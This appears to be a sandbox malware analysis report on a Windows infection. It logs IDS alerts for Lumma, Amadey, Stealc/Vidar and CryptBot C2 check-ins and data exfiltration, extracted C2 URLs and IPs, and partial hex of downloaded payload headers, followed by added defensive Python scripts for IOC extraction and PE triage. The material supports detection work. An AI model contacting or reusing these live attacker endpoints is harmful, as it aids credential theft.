                            Source: Network trafficSuricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.11:58574 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.11:62325 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53479 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53483 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.11:50808 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53487 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53490 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53497 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53517 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059018 - Severity 1 - ET MALWARE CryptBot CnC Checkin : 192.168.2.11:53531 -> 94.156.102.239:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53534 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53544 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53563 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059149 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rampnatleadk .click) : 192.168.2.11:57756 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53580 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53591 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53611 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53626 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53631 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53634 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53640 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53636 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53656 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:53639 -> 185.215.113.115:80
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53660 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49708 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49708 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49710 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49707 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49707 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49765 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53469 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:53471 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53469 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53471 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.11:53481 -> 104.102.49.254:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:53478 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53485 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.11:53496 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53500 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.11:53494 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53501 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53539 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53532 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.11:53532 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53535 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.11:53535 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.5.153:443 -> 192.168.2.11:53496
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53526 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53530 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.11:53530 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:53591 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53591 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53608 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53608 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:53622 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53622 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:53640 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:53638 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.11:53656 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53660 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.5.153:443 -> 192.168.2.11:53498
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53669 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53669 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:53671 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53671 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53580 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53580 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53666 -> 104.21.18.116:443
                            Source: Malware configuration extractorURLs: http://185.215.113.115/c4becf79229cb002.php
                            Source: Malware configuration extractorURLs: https://warlikedbeliev.org/api
                            Source: Malware configuration extractorIPs: 185.215.113.43
                            Source: unknownDNS traffic detected: query: kickykiduz.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: breakfasutwy.cyou replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: finickypwk.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: miniatureyu.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: leggelatez.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: shoefeatthe.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: DGGKjBirXBdcY.DGGKjBirXBdcY replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: bloodyswif.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: washyceehsu.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: savorraiykj.lat replaycode: Name error (3)
                            Source: global trafficTCP traffic: 192.168.2.11:53524 -> 193.176.153.180:2024
                            Source: global trafficTCP traffic: 192.168.2.11:53296 -> 1.1.1.1:53
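The Suricata alerts, the configuration-extractor lines and the NXDOMAIN list above are the part of this report an analyst usually wants as a structured blocklist. The parser below is an added example, not part of the Joe Sandbox report; its sample input is a handful of lines copied verbatim from the listing above (including the fused "Source: ...Suricata IDS:" form the page uses), so it can be pointed at the full section unchanged. It splits alerts by family keyword in the rule message, keeps only outbound destinations that are not the sandbox resolver (1.1.1.1, taken from the listing) as C2 endpoints, refangs the "name .tld" domains Suricata prints, and separates ordinary NXDOMAIN answers from the two "label.label" queries. Treating those repeated-label names as resolver probes (malware often resolves a random name and aborts if a sandbox's fake DNS answers it) is my assumption, not a claim the report makes.

```python
"""IOC extraction for Joe Sandbox 'Networking' lines. Added example; the input
below is copied from the report section above."""
import re
from collections import defaultdict
from urllib.parse import urlparse

REPORT_LINES = [
    "Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:53302 -> 185.215.113.115:80",
    "Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.11:53457 -> 185.215.113.43:80",
    "Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.11:53464",
    "Source: Network trafficSuricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.11:50829 -> 1.1.1.1:53",
    "Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53580 -> 172.67.139.144:443",
    "Source: Network trafficSuricata IDS: 2059018 - Severity 1 - ET MALWARE CryptBot CnC Checkin : 192.168.2.11:53531 -> 94.156.102.239:80",
    "Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.11:53496 -> 116.202.5.153:443",
    "Source: Malware configuration extractorURLs: http://185.215.113.115/c4becf79229cb002.php",
    "Source: Malware configuration extractorURLs: https://warlikedbeliev.org/api",
    "Source: Malware configuration extractorIPs: 185.215.113.43",
    "Source: unknownDNS traffic detected: query: kickykiduz.lat replaycode: Name error (3)",
    "Source: unknownDNS traffic detected: query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC replaycode: Name error (3)",
    "Source: unknownDNS traffic detected: query: DGGKjBirXBdcY.DGGKjBirXBdcY replaycode: Name error (3)",
]

SANDBOX_HOST = "192.168.2.11"   # analysis VM address as seen in the listing
RESOLVER = "1.1.1.1"            # its DNS resolver; DNS-lookup alerts point here, not at C2
FAMILIES = ("Lumma", "Amadey", "Stealc", "Vidar", "CryptBot")

SURICATA_RX = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d+) - (?P<msg>.+?) : "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")
CONFIG_URL_RX = re.compile(r"extractorURLs: (?P<url>\S+)$")
CONFIG_IP_RX = re.compile(r"extractorIPs: (?P<ip>[\d.]+)$")
DNS_NX_RX = re.compile(r"DNS traffic detected: query: (?P<name>\S+) replaycode: Name error \(3\)$")
# Suricata prints domains defanged as "name .tld", optionally followed by " in TLS SNI".
DEFANGED_RX = re.compile(r"\(([a-z0-9-]+) \.([a-z]+)(?: in TLS SNI)?\)")


def family_of(msg):
    """Family keywords found in a rule message ('Stealc/Vidar' yields both)."""
    low = msg.lower()
    return [f for f in FAMILIES if f.lower() in low]


def refang(msg):
    """'(bloodyswif .lat)' -> 'bloodyswif.lat'; None when the message has no domain."""
    m = DEFANGED_RX.search(msg)
    return f"{m.group(1)}.{m.group(2)}" if m else None


def is_repeated_label_probe(name):
    """Assumption: 'X.X' names (one random label used twice) are fake-DNS probes."""
    labels = name.split(".")
    return len(labels) == 2 and labels[0] == labels[1]


def extract_iocs(lines):
    iocs = {"c2_ips": defaultdict(set), "domains": defaultdict(set), "urls": set(),
            "nxdomain": set(), "dns_probes": set(), "sids": set()}
    for line in lines:
        if m := SURICATA_RX.search(line):
            fams = tuple(family_of(m["msg"])) or ("unknown",)
            iocs["sids"].add(int(m["sid"]))
            # Outbound alert to something other than the resolver: a C2 endpoint.
            if m["src"] == SANDBOX_HOST and m["dst"] != RESOLVER:
                for f in fams:
                    iocs["c2_ips"][f].add(m["dst"])
            if domain := refang(m["msg"]):
                for f in fams:
                    iocs["domains"][f].add(domain)
        elif m := CONFIG_URL_RX.search(line):
            iocs["urls"].add(m["url"])
            iocs["domains"]["config"].add(urlparse(m["url"]).hostname)
        elif m := CONFIG_IP_RX.search(line):
            iocs["c2_ips"]["config"].add(m["ip"])
        elif m := DNS_NX_RX.search(line):
            bucket = "dns_probes" if is_repeated_label_probe(m["name"]) else "nxdomain"
            iocs[bucket].add(m["name"])
    return iocs


if __name__ == "__main__":
    for key, value in extract_iocs(REPORT_LINES).items():
        print(key, dict(value) if isinstance(value, dict) else sorted(value))
```

Two details carry the triage value: inbound alerts (the Amadey "CnC Response" line, source 185.215.113.43) are not counted again as destinations, and DNS-lookup alerts are attributed to the domain they name rather than to the resolver they were sent to, so 1.1.1.1 never lands on the blocklist.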
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:51:29 GMTContent-Type: application/octet-streamContent-Length: 1808896Last-Modified: Sat, 01 Feb 2025 15:09:15 GMTConnection: keep-aliveETag: "679e391b-1b9a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 aa c4 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 
40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 7a 69 70 6a 68 72 61 00 00 1a 00 00 60 4f 00 00 f4 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 77 6f 72 65 69 74 71 00 10 00 00 00 60 69 00 00 04 00 00 00 74 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 78 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
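Each of the HTTP responses above begins with the first bytes of a downloaded PE (4d 5a ... 50 45 00 00), and that much of the file already says a lot before anything is executed. The script below is an added example and not part of the report: it reads the DOS header, the PE file header and the section table from such a dump and flags packer indicators. Its sample input is constructed, a minimal header whose field values are the ones visible in the first dump (e_lfanew 0xE8, i386, 7 sections, timestamp 0x6798BDCB, optional-header size 0xE0, characteristics 0x0102, which is the EXECUTABLE_IMAGE, 32BIT_MACHINE pair listed above, and the section names "   ", .rsrc, .idata, eight spaces, bzipjhra, iworeitq, .taggant with the flags printed there), with zero filler where the dump's stub and optional-header body sit. parse_report_hex() accepts a "Data Raw:" line copied from the report, provided the hex is copied exactly, since a dropped byte shifts every offset. The names of the helper functions are mine.

```python
"""First-bytes triage of a downloaded PE as printed in a sandbox 'Data Raw' dump.
Added example; the sample header is constructed from the values in the first dump."""
import struct
from datetime import datetime, timezone

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0xAA64: "arm64"}
# Names a linker or installer commonly emits; anything else is worth a look.
STANDARD_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                          ".edata", ".pdata", ".bss", ".tls", ".CRT", ".ndata"}


def build_sample_header():
    """Constructed header: field values from the first dump, zero filler elsewhere."""
    e_lfanew = 0xE8
    buf = (b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    buf += b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 7, 0x6798BDCB, 0, 0, 0xE0, 0x0102)
    buf += b"\x00" * 0xE0                     # optional header body, unused by this triage
    sections = [(b"   \x00    ", 0xE0000040), (b".rsrc", 0xC0000040),
                (b".idata  ", 0xC0000040), (b"        ", 0xE0000040),
                (b"bzipjhra", 0xE0000040), (b"iworeitq", 0xE0000040),
                (b".taggant", 0xE0000040)]
    for name, flags in sections:              # IMAGE_SECTION_HEADER is 40 bytes
        buf += name.ljust(8, b"\x00") + b"\x00" * 28 + struct.pack("<I", flags)
    return buf


def parse_report_hex(text):
    """Turn a 'Data Raw: 4d 5a ...' line (or bare hex) from the report into bytes."""
    return bytes.fromhex(text.split("Data Raw:")[-1])


def triage_pe_header(data):
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    sec_off = e_lfanew + 24 + opt_size        # signature (4) + file header (20) + optional header
    sections = []
    for i in range(nsec):
        off = sec_off + i * 40
        if off + 40 > len(data):
            break                             # dump ends before the section table does
        name = data[off:off + 8].split(b"\x00")[0].decode("latin-1")
        flags = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, flags))
    indicators = []
    for name, flags in sections:
        stripped = name.strip()
        if not stripped:
            indicators.append(f"blank section name {name!r}")
        elif stripped == ".taggant":
            indicators.append(".taggant section (IEEE Taggant marker added by some commercial packers)")
        elif stripped not in STANDARD_SECTION_NAMES:
            indicators.append(f"non-standard section name {name!r}")
        if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE:
            indicators.append(f"W+X section {name!r}")
    exe_flags = IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE
    return {"machine": machine, "machine_name": MACHINES.get(machine, hex(machine)),
            "timestamp": ts, "build_time": datetime.fromtimestamp(ts, timezone.utc).isoformat(),
            "characteristics": chars, "is_32bit_exe": chars & exe_flags == exe_flags,
            "sections": sections, "indicators": indicators}


SAMPLE_HEX = " ".join(f"{b:02x}" for b in build_sample_header())   # the report's printing style

if __name__ == "__main__":
    info = triage_pe_header(parse_report_hex("Data Raw: " + SAMPLE_HEX))
    print(info["machine_name"], info["build_time"], [n for n, _ in info["sections"]])
    print("\n".join(info["indicators"]))
```

The fourth response (Content-Length 1013457) is the odd one out: its section table reads .text, .rdata, .data, .ndata, .rsrc, .reloc, the layout of an NSIS installer, whereas the other four carry space-named and random-named writable-and-executable sections plus .taggant, which is what a packed loader looks like.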
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:51:33 GMTContent-Type: application/octet-streamContent-Length: 3028480Last-Modified: Sat, 01 Feb 2025 15:09:26 GMTConnection: keep-aliveETag: "679e3926-2e3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 32 00 00 04 00 00 3c 8a 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 